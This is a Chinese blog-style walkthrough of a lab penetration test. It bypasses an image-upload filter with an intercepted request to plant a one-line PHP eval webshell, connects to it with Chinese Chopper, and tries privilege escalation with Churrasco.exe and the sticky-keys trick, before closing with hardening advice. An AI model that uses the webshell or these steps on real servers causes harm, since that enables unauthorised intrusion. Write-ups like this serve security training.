一次图文并茂的***完整测试

一次图文并茂的***完整测试,第1张

一次图文并茂的***完整测试

任务:某公司授权你在其服务器上执行*****。在核心服务器上进行***测试,已知该web服务器的ip地址(10.1.1.178)包含敏感数据。

1。利用网站漏洞获取服务器外壳

2。创建新用户并将权限升级为管理员

3。获取服务器上的关键敏感数据(C:\console)。

本文仅供学习

***进程

1。探测信息

2。利用该漏洞获取管理帐户的密码

3。找到背景

4。登录后台获取web权限

如果存在直接上传漏洞,您可以利用


1。找到上传漏洞

先知道ip地址,然后打开网页访问,在站内找到上传点

上传pony文件出错,只能上传图像文件,只能进行包捕获

首先设置代理

2。代理设置


Google插件代理SwitchySharp设置代理,然后打开burpsuite捕获包,这里不做介绍

软件教学可以百度一下。代理端口应该相同


3。抓取并分析包,并将其更改为上传

开始抓袋子

help.jpg内容

<?php
eval($_POST['hao']);
?>

修改一下再上传。上传成功。


4。获取webshell权限

以上http是小马地址。打开中式菜刀,输入

获取webshell

5。提升管理权限

创建一个新用户并将权限提升到管理员

使用cmd命令获取管理员权限

添加用户hao并让他加入管理员组失败。没有办法,只能用工具来提高这里的权利

上传脚本,然后重命名,将php脚本复制到刚才的脚本中重命名后缀php

我们经常在网站提案中使用这些工具,Churrasco.exe(巴西烤肉)

如果webshell不能执行cmd,那么我们需要上传一个cmd

如果上传cmd后无法添加用户,那么我-我们需要上传软件索要权限

设置终端路径

无法提升权限。没有管理员组

进入远程桌面登录界面,按shift5五次,获取cmdwhoami/all

如果我们找到用户组并加入就可以了

一场图文并茂的***结束了。只是复制敏感数据,让大家觉得***不再神秘。事实上,更高层次的技术也在研究中。下次带上sqlmap注入练习教程。

6。安全建议:从上面的***测试中发现该服务器

1。及时修补系统的安全漏洞

2。细化服务器文件目录权限,杜绝权限漏洞

3。对于上传权限,可以通过修改服务器的配置来防止该漏洞。很多网站允许用户上传一定数量的图片、Flash等。很多时候,为了以后管理方便,网站开发者会把所有上传的文件都放在指定的文件夹里。管理员只需要将该文件夹的执行权限设置为“无”,就可以在一定程度上防范漏洞。


欢迎分享,转载请注明来源:内存溢出

原文地址: https://outofmemory.cn/zz/783544.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-05-04
下一篇 2022-05-04

发表评论

登录后才能评论

评论列表(0条)

保存